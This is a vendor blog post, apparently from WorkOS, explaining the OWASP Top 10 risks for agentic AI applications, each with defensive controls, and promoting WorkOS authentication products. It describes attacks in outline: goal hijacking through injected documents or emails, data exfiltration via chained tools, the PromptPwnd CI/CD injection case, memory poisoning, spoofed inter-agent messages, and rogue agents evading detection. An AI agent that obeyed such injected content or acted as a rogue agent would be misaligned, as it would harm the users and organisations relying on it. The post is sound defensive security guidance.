In this article

March 30, 2026

The OWASP Top 10 for agentic applications: What developers building with AI agents need to know

How AI agents get hijacked, poisoned, and over-privileged, and why identity is the fix for most of it.

Maria Paktiti

March 30, 2026

Explore with AI

Open in ChatGPT

Open in Claude

Open in Perplexity

AI agents aren't chatbots anymore. They schedule meetings, move money, provision infrastructure, and execute multi-step workflows across your production systems. They do this autonomously, often without a human checking every action before it fires.

That shift from "answer questions" to "take actions" is exactly why the OWASP GenAI Security Project released the Top 10 for Agentic Applications in December 2025. Developed by more than 100 security researchers and practitioners, the list identifies the most critical risks facing autonomous AI systems in production today.

If you're building software that uses agents, orchestrates tools via MCP, or ships AI-powered features to enterprise customers, this is required reading. In this article we'll walk through each of the ten risks, explain why they matter in practice, and outline the controls that actually work.

Two principles before the list

Before diving into individual risks, the framework foregrounds two design principles that underpin everything else.

‍Least agency. This is the agentic evolution of least privilege. It's no longer just about what an agent can access; it's about how much freedom it has to act on that access without checking back. Autonomy should be earned, not granted by default. If your agent has the credentials to drop a database but its job is to answer support tickets, something has gone wrong at the design level.‍
Strong observability. Limiting what an agent can do is only half the equation. You also need to see what it's doing, why, and with whose identity. Least agency without observability is blind risk reduction. Observability without least agency is surveillance of an agent you haven't bothered to constrain. The two principles work together, and every risk in the Top 10 maps back to a failure in one or both.

ASI01: Agent goal hijack

An attacker alters an agent's objectives or decision path through malicious content injected into the data the agent processes.

This is prompt injection's more dangerous cousin. In a traditional LLM app, a successful injection might produce a rude response or leak a system prompt. In an agentic system, the same attack can redirect the agent's entire plan of action. The agent still looks like it's working normally, but it's now pursuing a different goal.

The attack surface is wide: a poisoned document the agent summarizes, a crafted email it triages, or a web page it fetches for context. Any untrusted input that reaches the agent's planning loop is a potential vector.

What helps: Treat every external input as untrusted data, not instructions. Validate agent plans against an explicit allowlist of permitted actions. Implement guardrails that reject deviations from the original task scope. Run the agent in a sandboxed environment where a hijacked goal can't reach production systems.

ASI02: Tool misuse and exploitation

Agents use legitimate tools in unsafe ways, either because of ambiguous prompts, manipulated input, or tool chain sequences that nobody anticipated.

Your agent has access to a database query tool, a file writer, and an email sender. Individually, each is fine. But if a crafted input causes the agent to query sensitive records, write them to a file, and email that file to an external address, you've got data exfiltration through a perfectly authorized tool chain.

This is where the PromptPwnd class of vulnerabilities becomes relevant: untrusted content in GitHub issues and pull requests was injected into prompts inside CI/CD workflows. When paired with powerful tokens and tools, that led to secret exposure and repository modifications. The tools themselves were legitimate. The usage was not.

What helps: Scope tool permissions tightly. Validate tool arguments against schemas, not just types. Add policy controls to every tool invocation. Monitor tool chain sequences for anomalous patterns. And never give a tool write access to a system where it only needs read.

!!For more on this, see Securing agentic apps: How to stop your AI agents from misusing their own tools.!!

ASI03: Identity and privilege abuse

Agents inherit or escalate high-privilege credentials, creating opportunities for unauthorized access across systems.

This is the identity problem that gets worse with autonomy. In most current implementations, agents operate with the full credentials of the user who invoked them, or worse, with a shared service account that has broad access. If the agent is compromised (or just confused), it can do anything those credentials allow.

The pattern is familiar to anyone who's worked in enterprise security: overly permissive service accounts, static API keys that never rotate, and credentials that persist long after they should have expired. The difference with agents is that they can act on those credentials at machine speed across multiple systems simultaneously.

What helps: Give agents their own managed identity with restricted, time-bound scopes, rather than letting them borrow the user's session. Use OAuth 2.1 with sender-constrained tokens so credentials can't be replayed. Enforce fine-grained authorization (RBAC, ReBAC, or ABAC) at the tool level, not just the agent level. Audit every action the agent takes with proper attribution to both the agent identity and the user who authorized it.

!!For more on this, see Securing agentic apps: Give your AI agents their own credentials.!!

ASI04: Agentic supply chain vulnerabilities

Compromised tools, plugins, prompt templates, and external servers introduce vulnerabilities that agents leverage at runtime.

Traditional supply chain attacks target your build pipeline. Agentic supply chain attacks target your runtime. When your agent dynamically loads tools from an MCP server, fetches prompt templates from a registry, or delegates to a third-party sub-agent, each of those components becomes a trust boundary you need to verify.

In July 2025, CVE-2025-6514 was discovered in mcp-remote, a widely used MCP OAuth proxy distributed via npm. The vulnerability enabled command execution and credential compromise across hundreds of thousands of installations. Two months later, an npm phishing campaign compromised 18 popular packages, demonstrating how quickly malicious updates cascade through the exact kind of dependency graph that MCP servers rely on.

What helps: Pin and verify tool versions. Validate tool descriptors and schemas before loading them. Treat MCP servers as untrusted infrastructure until authenticated. Audit your agent's full dependency tree, including transitive dependencies. Implement integrity checks on prompt templates. Run third-party tools in isolated sandboxes with restricted network access.

!!For more on this, see Securing agentic apps: How to vet the tools your AI agents depend on.!!

ASI05: Unexpected code execution

Agents generate or run code and commands unsafely, creating opportunities for remote code execution, sandbox escapes, and data exfiltration.

Code generation is one of the most powerful agentic capabilities, and one of the most dangerous. When an agent writes a shell script, generates a SQL query, or produces a Python snippet for data analysis, the output inherits the full permissions of whatever runtime environment executes it.

A DevOps agent that generates deployment scripts could be tricked into including hidden commands. A data analysis agent could be manipulated into crafting queries that exfiltrate sensitive data. The attack doesn't need to be sophisticated; it just needs to reach the code generation step with malicious context.

What helps: Never execute agent-generated code with production credentials. Run generated code in sandboxed environments with no network access and minimal filesystem permissions. Validate generated code against a strict allowlist of permitted operations before execution. Implement output scanning for known malicious patterns (shell injection, SQL injection, SSRF).

ASI06: Memory and context poisoning

Attackers corrupt the data that agents rely on for knowledge and decision-making, causing flawed or malicious outcomes across sessions.

Agents with persistent memory (conversation history, RAG databases, embedding stores) introduce an attack surface that doesn't exist in stateless systems. If an attacker can inject false information into an agent's long-term memory during one session, that poisoned data influences every subsequent session.

The attack can be gradual: repeated interactions that slowly shift the agent's knowledge base. Or it can be targeted: a single interaction that plants a specific false fact the attacker knows the agent will act on later. In multi-agent systems, poisoning one agent's memory can cascade to every agent that consumes shared context.

What helps: Validate and sanitize all data before it enters long-term storage. Implement integrity checks on RAG databases and embedding stores. Scope memory access so agents can only read and write to their own context. Monitor for anomalous patterns in memory writes. Provide a mechanism to roll back corrupted memory state.

ASI07: Insecure inter-agent communication

Multi-agent systems face spoofing, message tampering, and unauthorized delegation between agents.

When you break a complex workflow across multiple specialized agents, the communication channel between them becomes critical infrastructure. If Agent A can tell Agent B to execute a privileged action without proper authentication, anyone who can forge a message from Agent A effectively controls Agent B.

The risks include spoofed identities (an attacker pretending to be a trusted agent), replayed messages (re-sending a legitimate authorization out of context), and false consensus attacks (fabricating agreement messages to trick a voting-based system).

What helps: Authenticate every inter-agent message. Sign communications with agent-specific keys. Validate message integrity and freshness (nonces, timestamps). Enforce authorization policies on delegation chains. Never allow one agent to escalate another agent's privileges.

ASI08: Cascading failures

Small errors propagate across planning and execution, amplifying through interconnected systems.

In a traditional application, a bug produces a wrong answer. In an agentic system, a small error in one step becomes the input to the next step, which amplifies it, which feeds it into the next step. A hallucinated API endpoint becomes a real API call that fails, which triggers an error-handling routine that makes a different (also wrong) API call.

The problem compounds in multi-agent architectures. Agent A produces a slightly wrong intermediate result. Agent B treats it as ground truth and builds on it. Agent C synthesizes both outputs into a recommendation that's confidently wrong in a way neither individual error would produce alone.

What helps: Implement circuit breakers that halt agent execution when error rates spike. Add validation checkpoints between planning and execution stages. Design agent workflows with explicit rollback mechanisms. Monitor for self-reinforcing error patterns. Set hard limits on chain depth and execution time.

ASI09: Human-agent trust exploitation

Users over-trust agent recommendations, enabling social engineering and covert harmful actions.

This risk targets the human, not the machine. Agents that communicate in natural language, display confidence, and have a track record of being helpful build implicit trust. Attackers exploit that trust by causing agents to present manipulated information with the same authority they use for legitimate recommendations.

The scenarios are concrete: an agent that presents a phishing link as a legitimate recommendation. An agent that modifies invoice details in a summary, replacing a real vendor's payment information with an attacker's. An agent that confidently recommends a course of action based on poisoned context.

What helps: Design UIs that distinguish between agent-generated content and verified information. Require human approval for high-stakes actions regardless of the agent's confidence level. Display provenance information so users can verify the sources behind recommendations. Implement anomaly detection on agent outputs to flag unusual recommendations.

ASI10: Rogue agents

Compromised or misaligned agents act harmfully while appearing legitimate, exploiting trust mechanisms in multi-agent workflows.

A rogue agent is one that has been compromised (through goal hijacking, supply chain attack, or memory poisoning) but continues to operate within the system's trust boundaries. It approves transactions it shouldn't approve, exfiltrates data while appearing to process it normally, or subtly corrupts the work of other agents it interacts with.

The key challenge is detection. A rogue agent looks legitimate because it was legitimate before it was compromised. It has valid credentials, follows normal communication patterns, and produces outputs that are close enough to correct to avoid simple validation checks.

What helps: Implement strict governance with behavioral monitoring. Run anomaly detection on agent output patterns, not just individual outputs. Enforce kill switches that can immediately halt any agent. Sandbox agents so a compromised instance can't persist across sessions. Monitor for drift in agent behavior over time.

Identity is the connective tissue

If you read through all ten risks, a pattern emerges: most of them are identity and authorization problems in disguise.

Goal hijacking succeeds because the agent doesn't distinguish between instructions from a trusted orchestrator and instructions embedded in untrusted data. Tool misuse succeeds because authorization is checked at the agent level rather than the tool level. Privilege abuse succeeds because agents inherit human credentials instead of operating with their own scoped identity. Inter-agent attacks succeed because communication channels lack authentication. Rogue agents succeed because there's no behavioral baseline tied to a verified identity.

The principle of least agency isn't just about limiting what agents can do. It's about building an identity layer that answers three questions for every action:

Who is acting? The agent should have its own identity, separate from the user who invoked it.
What are they authorized to do? Permissions should be scoped to the specific task, time-bound, and revocable.
Can we prove it later? Every action needs an audit trail that links the agent identity, the user authorization, and the specific tool invocation.

These are the same questions enterprises have been asking about human users for decades. The difference is that agents operate at machine speed, across multiple systems, and can be compromised in ways that humans can't. The controls need to be automated, granular, and enforced at every trust boundary, not just at the front door.

Securing AI agents and MCP servers with WorkOS

Most of the OWASP Top 10 boils down to two questions at every trust boundary:

Who is making this request?
Are they allowed to do what they're asking?

Authentication handles the first. Authorization handles the second. In agentic systems, you need both enforced at every layer, from the user session down to the individual tool invocation.

Authentication: Giving agents their own identity

The MCP specification adopted OAuth 2.1 as its authorization framework in March 2025, which was the right call. OAuth gives you scoped, time-limited tokens, proper client identification, and a revocation path that doesn't require rotating every credential in your system. The problem is that implementing an OAuth 2.1 authorization server from scratch is a significant amount of work, especially when your enterprise customers expect SSO, SAML federation, directory sync, and audit logging on top of it.

WorkOS AuthKit acts as the authorization server for your MCP deployments, handling the OAuth 2.1 flows so you can focus on building tools instead of building auth infrastructure. The setup maps directly to the three-party MCP architecture: the host (the AI app your user interacts with), the MCP client (which handles the protocol), and the MCP server (where tools and logic live).

For user-facing agents, you use the authorization code flow with PKCE. The user authenticates through WorkOS, the MCP client receives a scoped access token, and every tool invocation carries that token.

For machine-to-machine communication between agents and backend MCP servers, you use the client credentials flow. Each agent gets its own client ID and authenticates as itself, not with a borrowed human session. This is directly relevant to ASI03 (identity and privilege abuse): the agent operates with its own scoped identity, and if that identity is revoked, access stops immediately.

For enterprise customers with existing identity providers, WorkOS handles SAML and OIDC federation out of the box.

If you're already running user auth and want to add MCP server authentication without rebuilding your stack, WorkOS Connect works as an OAuth bridge: MCP clients authenticate through WorkOS, users sign in to your app, and WorkOS issues tokens that the MCP client presents to your server.

Authorization: RBAC for tool-level permissions

Authentication tells you who is acting. RBAC tells you what category of actions they can perform. You define roles that map to permission sets and assign them to agents, not just users. A "support-agent" role can read tickets and write internal notes but can't touch billing data. A "data-analyst-agent" role can run read-only queries but can't write to production tables.

WorkOS enforces these roles through the token claims that AuthKit issues. When an MCP server receives a tool invocation, it checks the agent's role against the required permission for that tool. If the role doesn't include billing:read, the billing tool rejects the request, regardless of what the underlying LLM thinks it should be doing.

This maps directly to ASI02 (tool misuse). Your agent might have access to a database tool, a file tool, and an email tool. RBAC ensures the "support-agent" role can query the database for reads only, can't write files to external paths, and can't send email outside the organization's domain. The tools exist in the agent's environment, but the permissions are scoped per role. When Agent A delegates to Agent B (ASI07), the delegation carries role context, and Agent B can't escalate beyond Agent A's permissions.

Fine-grained authorization for resource-level control

RBAC works when permissions map to roles. But agentic systems often need more nuance:

Can this agent access this specific workspace's data?
Can it modify this particular project?
Can it act on resources in this tenant, or across tenants?

WorkOS Fine-Grained Authorization (FGA) extends RBAC by adding hierarchical, resource-scoped access control. The mental model stays the same (roles, permissions, assignments), but roles are now scoped to specific resources arranged in a hierarchy, and permissions flow down that hierarchy automatically.

The building blocks are straightforward. You define resource types that mirror your product's entity structure: organizations, workspaces, projects, tools. You create resources at runtime with a type, an ID, and a parent. You define roles scoped to specific resource types, each carrying a set of permissions. Then you create assignments that bind a subject (a user, and soon agents and services) to a role on a specific resource. When an access check comes in, FGA evaluates not just the direct assignment, but also roles inherited from parent resources and organization-level roles.

Here's why this matters for agentic security. Consider ASI03 (identity and privilege abuse): a support agent should only access resources within the workspace its authorizing user belongs to. With tenant-wide RBAC alone, you'd either grant the agent access to all workspaces (over-privileged) or build custom scoping logic in your application code (fragile, hard to audit). With FGA, you assign the agent's authorizing user a role on a specific workspace, and FGA automatically grants access to the projects and resources nested within it, but nothing outside it. If the user's workspace assignment changes, the agent's access changes with it.

This hierarchical model is also how you enforce tenant isolation in multi-tenant agentic applications. The tenant boundary is a resource in the hierarchy, not a query filter you hope your code always remembers to apply. An agent operating within Tenant A's resource tree can never reach Tenant B's resources, because there's no assignment that bridges the two hierarchies.

For ASI10 (rogue agents), FGA provides a surgical containment mechanism. If you detect anomalous behavior, you revoke the agent's role assignment on the relevant resource. It loses access to that resource and everything beneath it in the hierarchy, immediately and consistently, even if its credentials are still technically valid. This is faster and more precise than rotating tokens or killing sessions.

FGA integrates with the same AuthKit flow described above. Organization-level roles and permissions are embedded directly in the access token for fast checks. Resource-scoped permissions hit the FGA API, which evaluates against the full hierarchy with sub-50ms latency. Every check is logged. When your customer's security team asks "which agent accessed what data, on behalf of which user, at what time," you have the answer.

What to do next

If you're building agentic applications, here's where to start:

Audit your current agent permissions. Map every tool, API, and system your agents can access. If the list is longer than what's needed for the agent's specific task, you're over-provisioned.
Stop letting agents borrow user sessions. Give them their own managed credentials with WorkOS AuthKit. Use PKCE for user-authorized actions and client credentials for machine-to-machine communication.
Add authorization at the tool level. Each tool invocation should be checked against both RBAC (does the agent's role permit this action type?) and FGA (is the agent authorized for this specific resource in the hierarchy?).
Treat MCP servers as critical infrastructure. They need OAuth 2.1 authentication, input validation, and dependency auditing. An unauthenticated MCP server with broad permissions is the agentic equivalent of an open S3 bucket.
Build observability from day one. Log every tool invocation, authorization decision, and inter-agent message. Link each action to the agent identity and user authorization that enabled it. You'll need these logs when (not if) something goes wrong.

The OWASP Top 10 for Agentic Applications is a field guide built from real incidents, and the risks it describes are already showing up in production systems. The good news is that you don't need to invent new security primitives for the agentic era. You need to apply proven patterns to a new class of actors: OAuth 2.1 for authentication, RBAC and FGA for authorization, audit logging for accountability. That's exactly what WorkOS is built for.

We’re hiring

Our global team is growing and we’re hiring all types of roles.

View open roles

About us

WorkOS builds developer tools for quickly adding enterprise features to applications.

Learn more